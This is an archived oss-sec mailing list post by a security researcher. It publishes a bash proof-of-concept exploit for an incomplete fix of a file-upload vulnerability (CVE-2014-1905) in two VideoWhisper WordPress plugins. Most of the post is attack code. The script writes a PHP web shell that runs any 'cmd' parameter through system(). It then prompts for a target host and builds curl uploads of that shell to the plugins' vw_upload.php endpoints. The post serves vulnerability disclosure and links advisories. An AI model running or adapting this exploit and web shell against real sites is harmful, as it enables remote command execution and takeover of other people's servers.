oss-sec mailing list archives
Exploit for VideoWhisper WP plugins file upload incomplete fix.
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Sat, 18 Apr 2015 06:06:13 -0700
#!/bin/bash #A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago. #Larry W. Cashdollar v1.0 cat > shell.pht << -EOF- <?php if(isset(\$_REQUEST[‘cmd’])){ echo "<pre>"; \$cmd = (\$_REQUEST[‘cmd’]); system(\$cmd); echo "</pre>"; } else { echo "Please supply a command cmd"; } ?> -EOF- red='\033[0;31m' NC='\033[0m' # No Color while [ true ]; do echo -e ${red}; echo -e " VideoWhisper Remote File Upload PoC Redux $NC"; echo " 4/14/2015"; echo " Larry W. Cashdollar, @_larry0"; echo echo echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as"; echo "SetHandler application/x-httpd-php in php5.conf"; echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905"; echo "and bid 53851."; echo " - Advisories -"; echo "http://www.vapid.dhs.org/blog/04-16-2015/"; echo "http://www.vapid.dhs.org/advisory.php?v=116"; echo "http://www.vapid.dhs.org/advisory.php?v=117"; echo echo echo "Ctrl ^C to exit"; echo -n "Enter Target Hostname :"; read target; echo -n "Enter 1 for integration 2 for presentation :"; read plugin; echo -n "Enter payload filename or (shell.pht):"; read file; echo "[+] Hostname $target"; echo "[+] File $file"; if [ $plugin == 1 ]; then echo "[+] Targeting Video Conference Plugin"; echo curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php else echo "[+] Targeting Video Presentation Plugin"; echo curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php fi; done
Current thread:
- Exploit for VideoWhisper WP plugins file upload incomplete fix. Larry W. Cashdollar (Apr 18)